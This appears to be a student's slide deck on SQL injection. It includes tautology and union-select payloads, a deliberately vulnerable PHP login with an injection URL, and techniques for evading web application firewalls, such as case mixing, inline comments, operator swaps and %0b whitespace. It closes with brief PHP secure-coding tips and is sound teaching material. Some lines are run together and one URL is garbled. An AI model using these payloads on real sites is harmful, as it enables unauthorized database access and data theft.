All Ab0ut 0f SQL Injection and WAF Bypass Techniques

THATSANAI DETDAMRONGPREEECHA

COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG

What is SQL Injection ?

Sql injection is code injection

Happened when user Inject sql command for change condition

because develop not filtered input from user

Logical Conjunction and Disjunction table

SQL Operator

And , &&

Or , ||

Like

*

( , )

< , >

+, - , *, /, %

SQL Comment

end of the line

"#"

"--"

"-- "

multiple line

/* */

Examples

vulnerability and inject command

sql command :

SELECT first_name, last_name FROM users WHERE user_id = '$id‘

Inject code :

SELECT first_name, last_name FROM users WHERE user_id = '1‘ or ‘1’SELECT first_name, last_name FROM users WHERE user_id = 'am’ or ‘am’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘1’=‘1’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘2600’=‘2600’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘HELLO’ or ‘HELLO’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or 1 #’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or true #’

sql command :

SELECT first_name, last_name FROM users WHERE user_id = $id

Inject code :

true‘1’ or ‘1’2 or 2

sql command :

SELECT first_name, last_name FROM users WHERE user_id = ($id)

Inject code :

1) or (12+3) or (5

http://cs.ssru.ac.th/cs01/mae/Pae/ตั�วอย่�างและโปรแกรมที่��โหลดๆมา/Login_thaicreate/PHP MySQL ก�บLogin Form ที่�าระบบ User ล�อกอ�น แบบง�าย่ ๆ ด�วย่ PHP และ MySQL โดย่ที่�าการตัรวจสอบ Username และPassword.htm

http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html

http://www.exploit-db.com/exploits/26405/

http://www.exploit-db.com/exploits/26416/

Example

$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'";

$result = mysql_query($sql, $db);

if ($result === FALSE)

die('Invalid SQL query');

if (mysql_num_rows($result) == 1) {

echo "Congrats, WIN!!!\n";

}

else {

echo "The number of rows is not 1\n";

}

login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#

Impact

Get Information in database

Can gaining access system

Etc.

Bypass Web Application Firewall

Techniques

What is Web Application Firewall

Web application Firewall ( WAF )

Software or Hardware

Emphasis in prevention on the website

Filters all data in application layer

Can detected and prevention website

How to Bypass? Original

1’ or ‘1’=‘1

union all select 1,2,3,4,5 –

union all select 1,2,@@version,4,5 –

Solution 1’ oR ‘1’=‘1

uNIon AlL sELeCt 1,2,3,4,5 –

u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --

How to Bypass? (cont.)

If Filter or , and

Solve : Using || instead of or

Using && instead of and

How to Bypass? (cont.)

If Filter where

Solve : Using limit instead of where

If Filter limit

Solve : You can Using group by and having instead of where

How to Bypass? (cont.)

If Filter whitespace

Solve : Using %0b instead of whitespace

If Filter ‘

Solve : Using 0xXX , unhex(xx) instead of ‘

How to Mitigation

Top 5 Secure Coding Tips for PHP applications

Filter Input Data GET , POST , COOKIE

Securing Database Queries

Filter Output Data htmlspecialchars()

htmlentities()

strip_tags()

strtr()

Error Handling log_errors = On

display_errors = Off

Preventing other injection attacks

References and Appendix

www.owasp.org

http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/

http://dev.mysql.com/doc/refman/5.0/en/non-typed-operators.html

http://thtutz.blogspot.com